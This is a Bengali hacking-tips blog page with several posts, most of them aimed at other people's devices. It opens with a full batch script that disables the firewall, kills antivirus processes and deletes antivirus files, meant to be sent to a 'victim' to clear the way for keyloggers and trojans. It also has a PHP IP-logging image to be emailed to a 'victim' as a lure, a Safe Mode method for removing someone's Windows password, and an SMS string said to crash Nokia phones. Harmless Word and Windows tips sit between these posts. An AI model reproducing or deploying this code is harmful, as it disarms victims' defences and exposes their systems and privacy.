আসসালামু আলাইকুম

বুধবার, ৪ এপ্রিল, ২০১২

///// হ্যাক করুন AnTi-ViRuS \\\\\

আজ আপনাদের জন্য একটি মজার টিপস্ নিয়ে এসেছি ।।। আপনিও এবার আপনার ভিক্টিমের AnTi-ViRuS ডিজেবল করতে পারবেন ।।। এজন্য আমরা Batch program ব্যবহার করবো ।।।


নিচের কোডটি কপি করে নোডপ্যাড ওপেন করে পেস্ট করুন ।।।

ফাইলটি .bat extension এ সেভ করুন ।।।।


@ echo off
rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem –

ফাইলটি ভিক্টিমের কাছে পাঠান …ভিক্টিম ফাইল এ ক্লিক করলেই কাজ শেষ ।

এটি আপনাকে হ্যাকিং এ প্রচুর সাহায্য করবে ।।।
বিশেষ করে কী লগার , ট্রোজান কে ভালো ভাবে কাজ করাতে antivirus ডিজেবল করা আবশ্যক ।

বোকাদের মতো নিজেই উক্ত ফাইলে ক্লিক কইরেন না ।।।
ভালো থাকুন , আজ এই পর্যন্তই ।।।।

Autorun.inf Virus বন্ধ করুন একটি সুন্দর Software দিয়ে

Softwareটির পরিচিতি?

Softwareটির নাম হল Rising Pc Doctor. নাম শুনেই বুঝতে পারছেন Softwareটির কাজ কি ধরনের। এই Softwareটি ব্যবহার করলে আপনার PC-তে autorun virus ডুকতে পারবে না। এছাড়াও আপনি Softwareটি দিয়ে আপনার PC-তে কোন Spyware বা Trojan Virur আছে কিনা তা Scan করে দেখতে পারবেন এবং থাকলে Delete করতে পারবেন। Softwareটি দিয়ে Pc এর Temporary File গুলোও Delete করা যায়। এছাড়াও এর বেশ কিছু কাজ আছে।



কিভাবে ব্যবহার করব?

Download শেষে Softwareটি করে Setup দিয়ে নিন।

1.এরপর Softwareটি Open করুন Desktop এর Rising PC Doctor Shortcutটিতে Click করে।

2.Softwareটি Open হলে আপনি Common Functions এ থাকবেন। এখন আপনি এখান থেকে Spyware বা Trojan Virus Scan করতে পারবেন।

3.এখন যদি Spyware Virus Scan করে পাওয়া যায় তাহলে Select All এ Click করে Remove Now Button এ Click করুন।

4.যদি Trojan Virus Scan করতে চান তাহলে Scan For Trojans Button এ Click করুন। এরপর Scan Object থেকে Select All এ Click করে Start Scan Button এ Click করুন।

যদি Virus পাওয়া যায় তাহলে Select All এ Click করে Kill Now Button এ Click করুন।

5.আপনি যদি Temporary File Delete করতে চান তাহলে Expert Tools এ Click করে Empty Bin Button এ Click করুন। এরপর নিচের দিকে Select All এ Click করে Start Scan Button এ Click করুন।

এখন Scan শেষ হলে আপনি Temporary File গুলোর Size এবং Location দেখতে পারবেন। Temporary File গুলো Delete করার জন্য Clear All Button এ Click করুন।

6.আপনি যদি চান কোন ধরনের Device যেমনঃ Pendrive/Removal Disk থেকে যেন autorun.inf virus আপনার PC-তে আসতে না পারে সেজন্য আপনাকে Automatic Protection এ Click করতে হবে। এখান থেকে Local Protection এ Click করুন এবং Immunize USB Media Enable করে দিন Enable Button এ Click করে।

যদি Enable হয়ে যায় তহলে তা ছবিতে Mark করা অংশটির মত দেখা যাবে। এরপর যদি আপনার Pc কোন Drive লাগানো হয় তাহলে Softeareটি autorun.inf নামে একটি Folder Driveটিতে খুলে দিবে autorun.inf virus থাকুক আর না থাকুক। যদি থাকে তাহলে তাকে Delete করে কাজটি করবে। আপনি অনেক সময় দেখবেন যে আপনর লাগানো Drive-টিতে Autorun.inf নামের Folder দেখা যাচ্ছেনা তাতে কোন সমস্যা নেই । যদি ঐ Drive-টিতে আগে থেকেই autorun.inf Virus বা Autorun.inf নামের Folder থাকে সে ক্ষেত্রে Softwareটি Virusটি Delete করে বা Autorun.inf নামের Folderটি Delete করে নতুন করে Autorun.inf নামের Folder খুলবে এবং তখন Folderটিকে Hidden করে রাখবে। আপনি Hidden File Show দিলেই তা দেখতে পারবেন।


7.এই Softwareটি আপনাকে Internet Protection দিবে। এটির দ্বারা আপনি URl Alert, IE Protection এবং Trojan Download Bloker Protection পাবেন যা কিনা Softwareটি নিজে নিজেই Enable করে নেবে।

8. আপনি Softwareটি দিয়ে Start Up Contorl করতে পারবেন। System Repair করে পারবেন। এজন্য আপনাকে Expert Tools এ যেতে হবে। এখান থেকে আপনার প্রয়োজন মত অন্যান্য Tools গুলো ব্যবহার করতে পারবেন।

Rising PC Doctor Download করব কোথায় থেকে?



http://www.softpedia.com/progDownload/Rising-PC-Doctor-Download-122985.html এই Link থেকে Softwareটির Latest Version Freeতে Download করতে External mirror 1 [EXE] তে Click করুন। Softwareটির Memory হল 9.08MB । আমি Softwareটি ব্যবহার করছি এটা বেশ কাজের।

মঙ্গলবার, ৩ এপ্রিল, ২০১২

PC DOCTOR::কি বোর্ড এর ALT এর কিছু সাধারণ কাজ[ MICROSOFT WORD - ২০০৭ ] + ♥♥♥

সবাইকে আবারও স্বাগতম । সবাই কেমন আছেন ? আশা করি ভাল আছেন + ভাল থাকবেন আজ আমি ALT এর কিছু সাধারণ কাজ সম্পর্কে বলব – [ MICROSOFT WORD-2007 এই শটকাট ভাল কাজ করবে ] “অজানাদের জন্য” ::



0১. ALT+F চাপলে মেনুবার আসবে ।

0২. ALT+1 চাপলে অটো SAVE হবে ।

0৩. ALT+২ চাপলে লেকার ্নডু অপশন আসবে ।

0৪. ALT+H চাপলে MICROSOFT WORD এর HOME অপশনে যাবে ।

0৫. ALT+N চাপলে MICROSOFT WORD এর INSERT অপশনে যাবে ।

০৬. ALT+P চাপলে MICROSOFT WORD এর Pge Layout অপশনে যাবে ।

0৭. ALT+S চাপলে MICROSOFT WORD এর References অপশনে যাবে ।

0৮. ALT+M চাপলে MICROSOFT WORD এর Mailing অপশনে যাবে ।

0৯. ALT+R চাপলে MICROSOFT WORD এর Review অপশনে যাবে ।

১০. ALT+W চাপলে MICROSOFT WORD এর View অপশনে যাবে ।

১১. ALT+X চাপলে MICROSOFT WORD এর Add – INS অপশনে যাবে ।

সহজ উপায়ে পিসির ইউজার পাসওয়ার্ড হ্যাক

শুভ অপরাহ্ণ । আমার টিউনের শিরোনামটা হতে পারত ইউজার পাসওয়ার্ড পুনরুদ্ধার । কেউ যদি তার নিজের কম্পিউটারে এই পদ্ধতিটা ব্যবহার করেন সেক্ষেত্রে এই কথাটা প্রযোজ্য তবে কেউ যদি অপরের কম্পিউটারে এটা প্রয়োগ করেন তবে সেটা অবশ্যই হ্যাকিং এর আওতায় পড়ে কারন হ্যাকিং এর মুল সংজ্ঞাই হল অনুমতিহীন অনুপ্রবেশ । যাই হোক, কেউ যদি নিজের কম্পিউটারে দেয়া পাসওয়ার্ড ভুলে গিয়ে থাকেন বা কারো ইউজার পাসওয়ার্ড ভেঙ্গে তার পিসি এক্সেস করতে চান তবে নিচের এই সহজ ধাপগুলো অনুসরন করুনঃ

# আপনার পিসিকে Safe mode এ অন করুন । (Safe mode এ রান করাতে হলে পিসির সুইচ অন করে bios message প্রদর্শন করার পরে F8 বাটন চাপুন তারপর Menu থেকে Safe mode সিলেক্ট করে এন্টার চাপুন)।

# এবার Login Screen আসলে Administration সিলেক্ট করুন । এতে কম্পিউটারটি Safe mode এ চালু হবে ।

# এখন Start>Settings>Control panel এ ক্লিক করুন । নিচের মত উইন্ডো আসবে-

# User accounts এ ক্লিক করুন ।

# or pick an account to change এর নিচে user account(বা কোন নামও হতে পারে, এখানে mrkm…com আছে) সিলেক্ট করুন । তারপর-

# Remove password এ ক্লিক করুন । সর্বশেষ,

# Remove password এ ক্লিক করুন ।

এখন কম্পিউটারটি Restart করুন । দেখুন কোন রকম পাসওয়ার্ড ছাড়াই পিসি অন হয়ে গেছে ।

আপনি চাইলে পুরনো পাসওয়ার্ডটিও খুজে বের করতে পারেন যা Microsoft তার system32 ফোল্ডারের ভিতর সেভ করে রাখে তবে এজন্য আপনাকে প্রোগ্রামিং কোড সম্বন্ধে কিছু ধারনা থাকতে হবে। এ ব্যপারে আরেকটি টিউনে বিস্তারিত লিখব । আজ এ পর্যন্তই । ধন্যবাদ সবাইকে ।

এবার যে কারও এবার আইপি সনাক্ত করুন

আসসালামু আলাইকুম, সবাইকে আবারও স্বাগতম আজকের টিউনে। কেমন আছেন সবাই? আশা করি মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আপনাদের জন্য নিয়ে এলাম একটি মজার জিনিস। কি জিনিস? হা হা হা হা। বুঝে ফেলেছেন! ভাল, খুবই ভাল। আপনাদের অনেক বুদ্ধি হয়েছে। আমি জানি না যে, টিউনার পেজ থেকে আপনারা কেমন সুবিধা পাচ্ছেন। মানে টিউনারপেজ থেকে আপনারা আপনাদের প্রয়োজনীয় সব কিছু পাচ্ছেন কিনা? আশা করি সমস্যা হওয়ার কথা না। যাক, আজকের টিউনে ফিরে আসি…


বিভিন্ন ক্ষেত্রে আমাদের অন্যের IP এড্রেস প্রয়োজন হয়। বিশেষ করে যখন আপনি সাধারণ হ্যাকিং করবেন, তখন আপনাকে আপনার ভিকটিমের IP address জানতেই হবে। না হলে আপনি তার কিছুই করতে পারবেন না। এখন আপনি ভাবছেন যে, কীভাবে আমি IP address বের করবো? কোন সমস্যাই নেই। “অনির্বাচিত টিউনার” আছে, তাই আশা করি এখনকার মতো সমস্যার সমাধান হবে। হা হা হা হা হাহা। এখন আমরা একটি .php পেজ তৈরি করব। আপনি প্রথমে নিচের কোডগুলো কপি করে নোটপ্যাডে পেষ্ট করুন। এবার File –> Save as এ ক্লিক করুন। এবার File Name এ লিখুন tunerpage.php এবার সেভ করুন। তবে অবশ্যই আপনি যে নামই দেন না কেন, নামের শেষে .php অবশ্যই দিবেন।

এবার কোডটি নিনঃ


$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$img_number = imagecreate(400,95);

$backcolor = imagecolorallocate($img_number,10,102,153);

$textcolor = imagecolorallocate($img_number,255,255,255);



imagefill($img_number,0,0,$backcolor);

$number0 = ” This is Your IP/Proxy”;

$number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]“;

$number2 = ” Host/Proxy: $hostname”;

$number4 = ” _________________________________”;



Imagestring($img_number,10,5,5,$number0,$textcolor);

Imagestring($img_number,10,5,25,$number1,$textcolor);

Imagestring($img_number,10,5,45,$number2,$textcolor);

Imagestring($img_number,10,5,50,$number4,$textcolor);

Imagestring($img_number,10,8,50,$number4,$textcolor);

Imagestring($img_number,10,5,10,$number4,$textcolor);

Imagestring($img_number,10,8,10,$number4,$textcolor);



header(“Content-type: image/png”);

imagepng($img_number);

$file=fopen(“Name-here-to-protect-the-File.txt”,”a”);

$file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host: $hostname – ‘\n’ “;

fwrite($file, $file2);

fclose($file);

?>

এবার আপনার .php ফাইলটি যে কোন ফ্রি ফাই্ল হোষ্টিং সাই্টে আপলোড করুন। যেমন- www.my3gb.com বা www.ripway.com.
এবার আপনার লিংকটি আপনার ভিকটিমের মেইলে পাঠান। তবে সাথে অবশ্যই এমন কিছু কথা লিখবেন, যাতে সে লোভে পড়ে যায়।
এবার যদি আপনার ভিকটিম কোন রকমে লিংকে ক্লিক করে, তাহলে তার আইপি আপনার হোষ্টিং সাইটে সেভ হয়ে যাবে।
এবার আপনার কাজে আইপিটি ব্যবহার করুন।
সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ…………………..

কিভাবে টাস্ক Manager , Folder Options and Registry editor in windows ওপেন করবেন ?

কিছু কিছু কম্পিউটারে যখন একই সাথে Alt+ctrl+del চাপা হয় তখন অনেক সময় task manager চালু হয়না । আবার registry editor এ প্রবেশ করতে গেলে বলে যে (Regitry Editor has been Disable by Administrator ) । এগুলো হয় malware attack এর কারনে । কখন কখন Hidden Files and Folder ও দেখা সম্ভব হয় না । সাধারনত আপনি My Computer এ ক্লিক করে windows explorer open করেন ।

তারপর নিচের কাজ টুকু করেন -

select tools > Folder options > view তারপর show hidden files,folder এ ক্লিক করেন ।
windows 7 & vista – My Computer এ ক্লিক করে windows explorer open করেন ।

click organise ” select folder and search options”
তারপর tick দিন “show hidden files,folder ….”
কিন্তু malware attack হলে এটা সম্ভব হয় না । তখন কি করবেন ??? এমন অবস্থায় আপনি নিচের পদ্ধতি অবলম্বন করতে পারেন ।

RegistryFix.exe application টি enable করে নিতে পারেন ।নিচে লিঙ্ক দিলাম –

http://www.mediafire.com/?0q6i5wg7h9rb9v7

TaskManagerFix.exe application ব্যাবহার করে Task manager এনাবল করতে পারেন ।

http://www.mediafire.com/?vz8t3vyy3le7z9c

এই লিঙ্ক থেকে ডাউনলোড করে নিন তারপর ডাবল ক্লিক করেন ।

PC তে Hidden Folders(in folder options) শো না করলে এই আপ্লিকেশান টি চালান ।

এই লিঙ্ক থেকে ডাউনলোড করে নিন তারপর repair e ক্লিক করেন ।

http://www.mediafire.com/?xpz5qoah43eb322

প্রথম পোস্টটি পরার জন্য ধন্যবাদ ।

আপনার পিসির হার্ডডিস্ক লুকিয়ে ফেলুন

নিজের ব্যক্তিগত কম্পিউটারটি অনেক সময় অন্য কারও ব্যবহার করার প্রয়োজন হয়। এমন সময় কিছু সমস্যা দেখা দিতে পারে। যেমন : কম্পিউটারে হয়তো আপনার ব্যক্তিগত কিছু আছে, যা অন্য কাউকে দেখতে দিতে চান না। আর এ সমস্যার সমাধান হিসেবে আপনি চাইলে আপনার হার্ডডিস্ক ড্রাইভগুলোকে লুকিয়ে বা স্থগিত করে রাখতে পারেন, যাতে অন্য কেউ ড্রাইভগুলো দেখতে বা প্রবেশ করতে না পারে।

কাজটি যেভাবে করবেন:

-Start Menu > Run> এ গিয়ে gpedit.msc লিখে এন্টার দিন

-group Policy নামে একটি Windoআসবে

-User configuration > Administrative Templates > Windows Components>Windows Explorer Commend দিন

-ডানপাশে অনেকগুলো Options দেখা যাবে

-ড্রাইভগুলো লুকানোর জন্য ‘Hide these specified drives in ¸ Computer’ এ ডাবল ক্লিক করুন

-নতুন একটি Windo িআসবে সেখানে Enable নির্বাচন করুন

-নিচে একটি ড্রপ ডাউন মেনু দেখা যাবে। ড্রপ ডাউন মেনুতে ক্লিক করে যে কোনো একটি অথবা সব ড্রাইভ ঐরফব করার জন্য Restrict all drives নির্বাচন করে Apply > ok করুন

-এবার গু Computer খুলে দেখুন ড্রাইভগুলো কোথায় যেন চলে গেছে

-একই নিয়মে ড্রাইভগুলোকে স্থগিত করে রাখতে পারেন

এর জন্য ‘Prevent access to drives from ¸ Computer’ এ ডাবল ক্লিক করে উপরোক্ত ৬ এবং ৭ নং নিয়ম অনুযায়ী কাজটি করে নিতে পারেন

-আগের সেটিংয়ে ফিরে যেতে ৬ নং Option এ থাকা অবস্থায় Not Configured করে দিতে হবে

১০১ % সঠিক বয়স জানুন মাত্র ১ সেকেন্ড এ :)

একটি ছোট এ্যাপ্লিকেশন এর মাদ্ধ্যমে জন্মের তারিখ টাইপ করেই জানতে পারেন আজকে পর্যন্ত আপনার বয়স, মাস এবং দিন । অনেকেই নিজের বয়স বের করার জন্য বিভিন্ন সফটওয়্যার ব্যবহার করে থাকেন। কিন্তু ভাল সফটওয়্যার পান না বা পেলেও কাজটা বুঝে উঠতে পারেন না। তাদের জন্য আমার এই সফটওয়্যারটি।


আসোলে কি লিখবো ভেবে পাচ্ছিলাম না কিন্তু অনেক দিন ধরেই লিখতে খুব ইচ্ছা করছিলো তাই অনেকের কাছে পরিচিতো একটি এ্যাপ্লিকেশন শেয়ার করলাম। আশা করি ভবিষ্যৎ এ ভালো কিছু উপহার দিতে পারবো। ধন্যবাদ

ডাউনলোড লিঙ্কঃ এখানে :)

মোবাইলে SMS পাঠিয়ে রিস্ট্রাট করে দিন বন্ধুদের মোবাইল!!!

আসুন শিখে ফেলি কিভাবে আপনি SMS পাঠিয়ে আপনার বন্ধুদের মোবাইল রিস্ট্রাট করে দিতে পারেন। এটা খুব। শুধু মাত্র নিচের কোড টি SMS করে পাঠিয়ে দিলেই ফোন রিস্ট্রাট হবে। এই জিনিসটা শুধু Nokia- 1110,1110i,1112,1100,2100 মডেলের হজ্যান্ডসেট গুলো রিস্ট্রাট দিতে পারে।

কোড
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

শুধু উপরে কোডটি এসএমএস করে পাথিয়ে দিন Nokia- 1110, 1110i, 1112, 1100, 2100 মডেলের নোকিয়া সেটের নাম্বারের।

আপনার মোবাইল থেকে এসএমএস পাঠেতে টাকা লাগবে, তাই আমি আপনাদের শিখিয়ে দিচ্ছি কিভাবে নেট থেকে ফ্রী এসএমএস পাঠানো যায়।

এখানে যান …http://uthsms.net/?on=sms

তারপর country bangladesh সিলেক্ট করেন আপনার বন্ধুর মোবাইল নাম্বার এসএমএস করুন। ।

সবাই ভাল থাকবেন…

কি ভাবে কার-ও জন্মতারিখ বের করবেন

যার জন্মদিন বের করতে চান তাকে একটি ক্যালকুলেটর বা হাতে নিম্নলিখিত ধাপ অনুসরণ করতে বলুন।
প্রথমে জন্মের মাসের সাথে ১৮ যোগ করতে বলুন

তারপর উত্তর কে ২৫ দ্বারা গুন করতে বলুন

৩৩৩ বিয়োগ করতে বলুন
৮ দ্বারা গুন করতে বলুন

৫৫৪ বিয়োগ করতে বলুন

২ দ্বারা ভাগ করতে বলুন
এবার জন্ম তারিখটি যোগ করতে বলুন

৫ দ্বারা গুন করতে বলুন

৬৯২ যোগ করতে বলুন

২০ দ্বারা গুন করতে বলুন

শুধুমাত্র জন্ম বছরের শেষ দুই সংখ্যা যোগ করতে বলুন

সব শেষে ৩২৯৪০ বিয়োগ করতে বলুন!

এবার চূড়ান্ত ফলাফলটি জানাতে বলুন।
উত্তর বিন্যাস হল: মাস / দিন / বছর।

উদাহরণস্বরূপ, একটি উত্তর ১২৩১৯৯, এর মানে হল যে জন্মতারিখ ৩১ ডিসেম্বর ১৯৯৯।

যদি উত্তর সঠিক না হয়, তবে আপনি ভুল নির্দেশাবলী অনুসরণ করেছেন অথবা জন্মদিন সম্পর্কে মিথ্যা বলেছে।
উপরোক্ত গণনার মাধমে আপনি যে কার-ও জন্ম তারিখ বলে দিতে পারবেন।

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More